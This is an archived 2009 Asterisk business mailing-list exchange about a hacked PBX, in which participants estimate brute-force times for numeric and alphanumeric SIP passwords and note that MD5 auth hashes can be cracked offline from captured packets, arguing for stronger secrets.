[asterisk-biz] PBX got Hacked

Tue Mar 10 16:16:33 CDT 2009

Very insightful, thank you Bret.

Barring packet sniffing (which can only be done along the route right?) 
more secure passwords would make a real difference.

Here is a question - has anyone on the list had an account hacked where 
the password wasn't stupid (where stupid=(1234,1111,secret,${EXTEN}, etc))?

My thought is, the botnets are probably looking for low hanging fruit. 
I'd love to know if anyone has evidence that that isn't the case.

Andy

Anteil, Inc. <http://www.anteil.com>
------------------------------------------------------------------------

*Andrew M. Lauppe
* /Consultant/

	4051B Executive Park Dr.
Harrisburg, PA 17111
------------------------------------------------------------------------
+1 (877) OS-LINUX x23
+1 (484) 421-9919 direct

Trixter aka Bret McDanel wrote:
> On Tue, 2009-03-10 at 16:14 -0400, Andrew M. Lauppe wrote:
>   
>> We discussed this on freenode #freepbx today, and someone did the
>> following math.
>>
>> A 20 digit numerical password/secret (numerical meaning only 0-9 -
>> obviously), attacked via brute force at 5,000,000 passwords per
>> second, would take more than 600,000+ years to crack. I didn't verify
>> but it looks about right.
>>
>>     
> 20 digit is 100,000,000,000,000,000,000 combinations assuming that there
> are no blacklisted ones in that space.
>
> 100,000,000,000,000 seconds at 5M/sec. (for reference about what the
> total US debt is including social security and other things that
> normally dont show on the national debt numbers).
>
> about 3.1M years for an exhaustive search, statistically speaking it
> would be half that time on average if you are doing multiple, or about
> 1.6M years.
>
> If the password is alphanumeric then it goes from 100 million trillion
> to 13,367,495,000,000,000,000,000,000,000,000 or 13,367 trillion
> trillion and I am not even going into case sensitivity or other
> characters that could be used.
>
> If you just used upper case letters and numbers, 10 characters would be
> about 23 years @ 5M/sec for an exhaustive search.  12 would be 30k
> years.  See below about how this time could be shortened.
>
>   
>> Lesson of the day? Sure, more secure passwords aren't THE solution,
>> but they sure help. I'm pretty sure any attempt to brute force a SIP
>> password on an asterisk box at anything approching 5 million passwords
>> per second would have side effects that would bring the attack to your
>> attention (like bringing your sip stack to it's knees perhaps?)
>>
>>     
>
> it depends on how they are doing it.  Brute forcing *can* be via capture
> packets, everything needed to get the password is in the auth packets in
> sip.  There are a lot of different ways to get the hashes, they may be
> able to get the hash without really doing much else, or they may be in a
> position to do much more evil things.
>
>
>   
>> With most phones being auto-provisioned, the length of the password
>> shouldn't be a limiting factor. Make your passwords/secrets more
>> complex and we can be done with this conversation. Please.
>>
>>     
> Well it is MD5 in sip, so the 5M/sec doesnt really hold if they are
> doing it on a botnet or similar that is outside your control via
> captured headers.  Of course stopping people from capturing headers is
> beyond the scope of a packet filtering system.
>
>
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> --Bandwidth and Colocation Provided by http://www.api-digital.com--
>
> asterisk-biz mailing list
> To UNSUBSCRIBE or update options visit:
>    http://lists.digium.com/mailman/listinfo/asterisk-biz
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.digium.com/pipermail/asterisk-biz/attachments/20090310/43f6bd4e/attachment.htm 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: Anteil_email.jpg
Type: image/jpeg
Size: 3436 bytes
Desc: not available
Url : http://lists.digium.com/pipermail/asterisk-biz/attachments/20090310/43f6bd4e/attachment.jpg 